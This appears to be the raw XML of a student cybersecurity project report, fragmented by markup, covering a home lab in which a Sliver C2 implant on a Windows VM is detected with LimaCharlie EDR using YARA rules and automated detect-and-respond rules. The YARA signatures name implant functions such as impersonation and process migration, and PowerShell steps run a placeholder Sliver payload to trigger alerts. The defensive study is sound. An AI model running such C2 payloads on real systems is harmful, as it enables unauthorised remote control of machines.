        </w:num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a) Adding the Sliver YARA Rule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Adding a new rule as “sliver” in Automation &gt; YARA Rules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rule, authored by National Cyber Security Centre (NCSC) UK, focuses on detecting Sliver Windows and Linux implants based on paths and function names within the binary, in the Rule block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val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t># sliver signature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rule sliver_github_file_paths_function_names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meta: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author = "NCSC UK"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description = "Detects Sliver Windows and Linux implants based on paths and function names within the binary"</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strings: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$p1 = "/sliver/"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$p2 = "sliverpb."</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$fn1 = "RevToSelfReq"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$fn2 = "ScreenshotReq"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$fn3 = "IfconfigReq"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$fn4 = "SideloadReq"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="24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$fn5 = "InvokeMigrateReq"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="24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$fn6 = "KillSessionReq"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$fn7 = "ImpersonateReq"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$fn8 = "NamedPipesReq"</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condition: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(uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and (all of ($p*) or 3 of ($fn*))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rule sliver_proxy_isNotFound_retn_cmp_uniq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meta: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author = "NCSC UK"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description = "Detects Sliver implant framework based on some unique CMPs within the Proxy isNotFound function. False positives may occur"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strings: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 = {C644241800C381F9B3B5E9B2}</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 = {8B481081F90CAED682}</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condition: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(uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them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rule sliver_nextCCServer_calcs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meta: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author = "NCSC UK"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description = "Detects Sliver implant framework based on instructions from the nextCCServer function. False positives may occur"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strings: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 = {4889D3489948F7F94839CA????48C1E204488B0413488B4C1308}</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condition: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(uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them</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w:t>
      </w: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b) Creating Additional YARA Rule for Sliver</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Another YARA rule named "sliver-process" is created, inspired by NCSC UK, detects Sliver Windows and Linux implants based on obvious strings within the binary.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sliver-process rule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rule sliver_strings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meta:</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author = "Eric Capuano, inspired by NCSC UK"</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description = "Detects Sliver Windows and Linux implants based on obvious strings within - not tested at scale, but it's probably good :)"</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strings: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$p1 = "/sliver/"</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$p2 = "sliverpb"</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condition:</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    all of ($p*)</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5.92 Setting Up Generic D&amp;R Rules for YARA Detection Alerts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:num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Creating a Rule for YARA Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>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Detect rule:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="24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9100" cy="1662430"/>
            <wp:effectExtent l="0" t="0" r="6350" b="13970"/>
            <wp:docPr id="40" name="Picture 40" descr="Screenshot 2024-03-01 1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03-01 114420"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5499100" cy="1662430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="240"/>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criteria ensures detection of YARA alerts that do not involve a PROCESS object, which will be handled separately in another rule.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Response rule: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01005" cy="1234440"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="41" name="Picture 41" descr="Screenshot 2024-03-01 1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3-01 114451"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5501005" cy="123444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These actions generate a report for the YARA detection event, along with adding a specific tag to the alert for easy identification and management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>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Creating a Rule for YARA Detection in Memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>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Detect rule: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9735" cy="1511300"/>
            <wp:effectExtent l="0" t="0" r="5715" b="12700"/>
            <wp:docPr id="42" name="Picture 42" descr="Screenshot 2024-03-01 11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3-01 114609"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5499735" cy="151130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criteria focuses on detecting YARA detections specifically involving a PROCESS object.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Response Rule:</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501005" cy="1234440"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="43" name="Picture 43" descr="Screenshot 2024-03-01 1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3-01 114451"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5501005" cy="123444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These actions generate a report for YARA detection events involving memory, along with adding a specific tag for easy identification and management.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5.9.3 Automatically YARA scan downloaded EXEs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Create a new rule YARA Scan Downloaded EXE, for looking for NEW .exe files to appear in any user's Downloads directory.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Detect block:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="24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8465" cy="2336800"/>
            <wp:effectExtent l="0" t="0" r="6985" b="6350"/>
            <wp:docPr id="44" name="Picture 44" descr="Screenshot 2024-03-01 11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3-01 114753"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5498465" cy="2336800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="240"/>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Response block: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9735" cy="2329180"/>
            <wp:effectExtent l="0" t="0" r="5715" b="13970"/>
            <wp:docPr id="45" name="Picture 45" descr="Screenshot 2024-03-01 11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3-01 114831"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5499735" cy="232918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response action generates an alert for the EXE creation, but more importantly, kicks off a YARA scan using the Sliver signature against the newly created EXE.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6"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>5.9.4 Automatic YARA scan processes launched from Downloads directory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Create a new rule YARA Scan Process Launched from Downloads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Detect block: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9735" cy="1875790"/>
            <wp:effectExtent l="0" t="0" r="5715" b="10160"/>
            <wp:docPr id="47" name="Picture 47" descr="Screenshot 2024-03-01 11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3-01 115124"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5499735" cy="1875790"/>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This rule is matching any process that is launched from a user's Downloads directory.</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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Response block:</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5498465" cy="2127885"/>
            <wp:effectExtent l="0" t="0" r="6985" b="5715"/>
            <wp:docPr id="46" name="Picture 46" descr="Screenshot 2024-03-01 11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3-01 115052"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5498465" cy="2127885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>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this rule, we’re no longer scanning the FILE_PATH, but the actual running process by specifying its PROCESS_ID. We are also now using the other YARA rule we created, sliver-process.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5.9.5 Scanning New EXEs in Downloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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 xml:space="preserve">Move the payload from Downloads to different location. </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Move-Item -Path C:\Users\User\Downloads\[payload_name].exe -Destination C:\Users\User\Documents\[payload_name].exe</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>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Now, put it back to generate the NEW_DOCUMENT event for an EXE being dropped into the Downloads folder:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>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lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Move-Item -Path C:\Users\User\Documents\[payload_name].exe -Destination C:\Users\User\Downloads\[payload_name].exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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Detections tab, an initial alert "EXE dropped in Downloads directory" followed shortly by a YARA detection is detected as the scan kicked off and found Sliver inside the EXE.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6"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>5.9.6 Scanning processes launched from Downloads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Launch an Administrative PowerShell prompt to test our NEW_PROCESS rule to scan running processes launched from Downloads.</w:t>
      </w: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bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">-  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Kill any existing instances of our Sliver C2 from previous labs. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Get-Process [payload_name] | Stop-Process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5628640" cy="1325880"/>
            <wp:effectExtent l="0" t="0" r="10160" b="7620"/>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52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5628640" cy="1325880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Execute the Sliver payload to create the NEW_PROCESS event that trigger the scanning of a process launched from the Downloads directory:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\Users\User\Downloads\[payload_name].exe </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>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Detections tab, a new detection "Execution from Downloads directory" followed shortly by a YARA detection in Memory is detected as the scan found Sliver inside the EXE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="315884"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="315884"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Chapter 6: Conclusion</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6.1 Applications of Real-Time Threat Detection and Response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this project, we have demonstrated the practical applications of real-time threat detection and response in the cybersecurity domain. By setting up a simulated attack scenario involving an attacker (Ubuntu VM) and a victim (Windows11 VM), and leveraging tools such as Sliver C2 framework and LimaCharlie EDR, we have showcased the effectiveness of proactive threat monitoring and rapid response mechanisms.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Real-time threat detection and response have numerous applications across various industries and sectors. In the realm of enterprise cybersecurity, organizations can deploy similar methodologies to detect and mitigate advanced persistent threats (APTs), ransomware attacks, and other malicious activities targeting their networks and endpoints. By continuously monitoring system logs, network traffic, and endpoint activities, security teams can identify anomalies and potential indicators of compromise (IoCs) in real-time, allowing them to take immediate action to neutralize the threat before it escalates.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Furthermore, the concept of real-time threat detection and response is not limited to traditional IT environments but also extends to emerging technologies such as cloud computing, IoT (Internet of Things), and OT (Operational Technology) systems. As these technologies become increasingly interconnected and integrated into critical infrastructure, the need for proactive threat detection and response capabilities becomes even more imperative to safeguard against cyber attacks and data breaches.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6.2 Future Scope and Enhancements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While this project has provided a comprehensive overview of real-time threat detection and response techniques, there are several areas for future research and enhancement:</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Integration of additional security tools and technologies: Explore the integration of complementary security tools and technologies to enhance the effectiveness of threat detection and response. This could include incorporating machine learning algorithms for anomaly detection, leveraging threat intelligence feeds for IoC enrichment, or integrating automated incident response playbooks for faster mitigation of security incidents.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Expansion of attack scenarios and use cases: Extend the scope of the project by simulating a wider range of attack scenarios and use cases, including insider threats, supply chain attacks, and zero-day exploits. By diversifying the attack surface and testing the resilience of existing detection and response mechanisms, security teams can better prepare for real-world cyber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Enhancement of automation and orchestration capabilities: Explore ways to automate and orchestrate the entire threat detection and response workflow, from initial alert triage to incident investigation and remediation. This could involve developing custom scripts, workflows, or playbooks to streamline security operations and reduce response times.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Adoption of cloud-native security solutions: With the increasing adoption of cloud services and infrastructure, there is a growing need for cloud-native security solutions that can provide real-time visibility and control across multi-cloud environments. Explore the integration of cloud-based EDR platforms, serverless security monitoring tools, and container security solutions to address emerging threats in cloud-native architectures.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bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>6.3 Lessons Learned and Insights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Throughout the course of this project, several key lessons and insights have been gained:</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Importance of proactive threat hunting: Proactive threat hunting plays a crucial role in uncovering hidden threats and identifying IoCs that may evade traditional security controls. By adopting a proactive approach to threat detection, organizations can stay one step ahead of cyber adversaries and minimize the impact of security incidents.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Value of collaboration and information sharing: Collaboration and information sharing among security professionals and industry peers are essential for staying abreast of emerging threats and evolving attack techniques. By participating in threat intelligence sharing communities, attending cybersecurity conferences, and engaging in knowledge exchange forums, security teams can leverage collective insights and expertise to enhance their defensive capabilities.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Continuous learning and skill development: The field of cybersecurity is constantly evolving, with new threats and vulnerabilities emerging on a regular basis. Therefore, it is essential for cybersecurity professionals to invest in continuous learning and skill development to stay updated with the latest trends, tools, and techniques. By pursuing certifications, attending training courses, and participating in hands-on labs and capture-the-flag (CTF) competitions, security practitioners can sharpen their skills and enhance their effectiveness in combating cyber threats.</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r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>In conclusion, real-time threat detection and response are essential components of a robust cybersecurity strategy, enabling organizations to proactively identify and mitigate security threats before they cause significant damage. By leveraging advanced tools, techniques, and best practices, security teams can strengthen their cyber defenses and protect against a wide range of cyber threats in today's dynamic threat landscape.</w:t>
      </w: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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F528D"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualBox Downloads - Oracle VM VirtualBox. Available at: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w: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"https://www.virtualbox.org/wiki/Downloads"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https://www.virtualbox.org/wiki/Downloads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="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 xml:space="preserve">BishopFox/sliver: Cross-platform implant framework. Available at: </w:t>
      </w:r>
      <w:r>
